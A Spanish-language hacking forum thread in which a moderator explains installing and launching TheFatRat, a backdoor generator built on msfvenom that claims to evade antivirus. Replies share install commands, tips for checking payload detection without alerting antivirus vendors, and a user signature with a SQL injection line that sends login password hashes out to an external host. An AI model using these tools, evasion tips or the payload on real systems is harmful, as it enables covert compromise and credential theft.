Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

TheFatRat - Tutorial [1] - Que es? - Instalación - Ejecutarlo

  • 9 Respuestas
  • 11896 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado puntoCL

  • *
  • Moderator
  • Mensajes: 279
  • Actividad:
    0%
  • Reputación 6
  • Magallanes no es chile :D
    • Ver Perfil
« en: Enero 15, 2017, 02:46:16 am »
TheFatRat





Este tutorial lo voy a dejar en stand by. estoy haciendo algo similar pero con metasploit

¿QUE ES TheFatRat?

En una forma mas sencilla de explicar esta herramienta que genera backdoor "payload" con msfvnom, "que es una parte de metasploit". se puede ejecutar en windows, android, mac. Esta herramienta tiene la capacidad de evadir los AV "anti-virus"



INSTALACIÓN

Escribimos los siguientes pasos en la consola

1.- git clone https://github.com/Screetsec/TheFatRat.git
2.- cd TehFatrat/Setup
3.- chmod +x setup.sh && ./setup.sh

En el primer paso clonamos desde de github TheFatRat
En el segundo paso vamos a la carpeta "Setup" adentro de TheFatRat
y el tercer paso le damos permiso de ejecución y a la vez ejecutamos la instalación



Después no vas a chequear si tenemos instalado
- msfconsole -
- msfvenom -
- zenity -
- gcc compiler -
- mingw32 compiler -
- backdoor-factory -
- monodevelop -
- ruby -
- apache2 -

En caso que no lo tenemos instalado, TheFatRat automáticamente lo va a instalar



Ya una vez finalizada no aparecerá esto





EJECUTARLO

Ahora cuando ya tenemos todo listo nos falta abrir la herramienta para esto vamos a la carpeta de TheFatRat una vez ya adentro hacemos un "ls" para ver el contenido de la carpeta, y tenemos que ejecutar el segundo archivo llamado fatrat que no aparece en la imagen pero sale con letra color blanco



es por que no tiene permiso de ejecución, tenemos que darle el permiso a la igual que hicimos anteriormente con setup.sh. en la consola escribimos

chmod +x fatrat
chmod +x powerfull.sh

el archivo powerfull.sh igual tenemos que darle permiso de ejecución, una vez terminado ahora se va a cambiar de color verde eso significa que ya están con el permiso de ejecución



y para finalizar escribimos

./fatrat

para ejecutar la herramienta



NOTA MENTAL


 
Si usted va verificar si su backdoor es detectable por los AV no lo suban a WWW.VIRUSTOTAL.COM por que VIRUSTOTAL tiene un contrato con las compañias de antivirus. cuando tu subes tu backdoor a virus total el archivo contiene una firma y esa firma se envia automaticamente a las compañias de antivirus y a los meses despues esa firma son detectada facilmente

http://www.nodistribute.com/



LATER

TheFatRat - Tutorial [2] - Generar backdoor con msfvenom para windows (.exe)
TheFatRat - Tutorial [3] - Generar backdoor con msfvenom en php
TheFatRat - Tutorial [4] - Generar backdoor con msfvenom en doc
TheFatRat - Tutorial [5] - Generar backdoor con msfvenom en rar
TheFatRat - Tutorial [6] - Ataque afuera de la red




« Última modificación: Abril 28, 2017, 08:04:36 am por puntoCL »




Desconectado sadfud

  • *
  • Moderator
  • Mensajes: 182
  • Actividad:
    1.67%
  • Reputación 9
    • Ver Perfil
    • Blog
  • Skype: SadFud
« Respuesta #1 en: Enero 15, 2017, 01:01:25 pm »
Gracias, buen tutorial.

Como recomendacion, no usar "nodistribute"; Nod Is Tribute. Y no, no es casualidad, envia a NOD32. Comoa lternativa se puede usar pscan.xyz o stopvir.us
Si necesitas ayuda, no dudes en mandar MP

Desconectado R3v0lve

  • *
  • Underc0der
  • Mensajes: 80
  • Actividad:
    0%
  • Reputación 3
  • No se sale adelante celebrando éxitos sino superan
    • Ver Perfil
  • Skype: антисоціальна
  • Twitter: антисоціальна
« Respuesta #2 en: Enero 15, 2017, 11:43:09 pm »
Excelente lo probe y funciona  solo eh testado  con apk

Enviado desde mi SM-G928T mediante Tapatalk

Ми повинні мати віру в себе. У цьому і полягає секрет. Навіть коли я був у дитячому будинку і ходили по вулицях у пошуках їжі, щоб жити, навіть тоді, я вважав найбільшим актором в світі. Без абсолютної впевненості, один приречена на провал.

Desconectado manoverde

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #3 en: Enero 16, 2017, 05:16:17 am »
No consigo instalarla desde la terminal, estoy con Kali en Liveusb, me dice "No such file or directory" después de clonar lo, a ver si me podéis echar un cable 1000 gracias!!
« Última modificación: Enero 16, 2017, 05:19:26 am por manoverde »

Desconectado puntoCL

  • *
  • Moderator
  • Mensajes: 279
  • Actividad:
    0%
  • Reputación 6
  • Magallanes no es chile :D
    • Ver Perfil
« Respuesta #4 en: Enero 16, 2017, 05:38:39 am »
No consigo instalarla desde la terminal, estoy con Kali en Liveusb, me dice "No such file or directory" después de clonar lo, a ver si me podéis echar un cable 1000 gracias!!

Verifica las rutas

saludos




Desconectado manoverde

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #5 en: Enero 17, 2017, 10:44:06 am »
No consigo instalarla desde la terminal, estoy con Kali en Liveusb, me dice "No such file or directory" después de clonar lo, a ver si me podéis echar un cable 1000 gracias!!

Verifica las rutas

saludos
Perfecto!
Ya me funciona, muchas gracias!
Ahora me falta dedicarle tiempo para probarla, aprender y entenderla.

Desconectado simranjit1975

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: notengolosiento
« Respuesta #6 en: Enero 18, 2017, 06:49:21 pm »
La probaré mañana mismo.

Enviado desde mi XT1572 mediante Tapatalk


Desconectado The Smiley Man

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
    • Email
« Respuesta #7 en: Enero 20, 2017, 05:55:26 pm »
Increible herramienta, estare esperando el proximo tutorial.

Conectado Slenderhack

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #8 en: Enero 22, 2017, 03:49:08 pm »
Muy buen aporte  ;) !!
ahora mismo lo descargo , esperamos los proximios post con ansias  :) :)

Desconectado 'or '1'=1

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 2
  • 1;if+not(select+s_user)+<>'sa'+waitfor+delay+'1'--
    • Ver Perfil
    • Email
  • Skype: :)
« Respuesta #9 en: Enero 30, 2017, 11:30:24 am »
Código: Bash
  1. apt-get install mingw32
  2. git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
  3. cd setup
  4. bash setup.sh
  5. chmod +x fatrat
  6. ./fatrat
  7.  

« Última modificación: Enero 30, 2017, 11:35:54 am por 'or '1'=1 »
1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

 

¿Te gustó el post? COMPARTILO!



Tutorial - "Recuperar datos borrados dispositivo almacenamiento"

Iniciado por Cl0udswX

Respuestas: 7
Vistas: 6626
Último mensaje Octubre 22, 2017, 04:27:09 pm
por b4r7
Breve Tutorial Sobre Ingenieria Social + Algunos Ejemplos

Iniciado por Krau[Z]ereth

Respuestas: 2
Vistas: 6905
Último mensaje Junio 28, 2012, 04:04:06 am
por aura16
Super tutorial de comandos MS-DOS(primera parte) by k43l

Iniciado por k43l

Respuestas: 6
Vistas: 6809
Último mensaje Abril 07, 2010, 09:35:17 pm
por k43l
Utilizando BeEF-XSS Framework-Tutorial Español - Backtrack 5 R3

Iniciado por Aryenal.Bt

Respuestas: 2
Vistas: 6433
Último mensaje Febrero 02, 2013, 09:02:37 pm
por Aryenal.Bt
Super tutorial de comandos MS-DOS(segunda parte) by k43l

Iniciado por k43l

Respuestas: 2
Vistas: 4298
Último mensaje Abril 06, 2010, 10:56:34 am
por k43l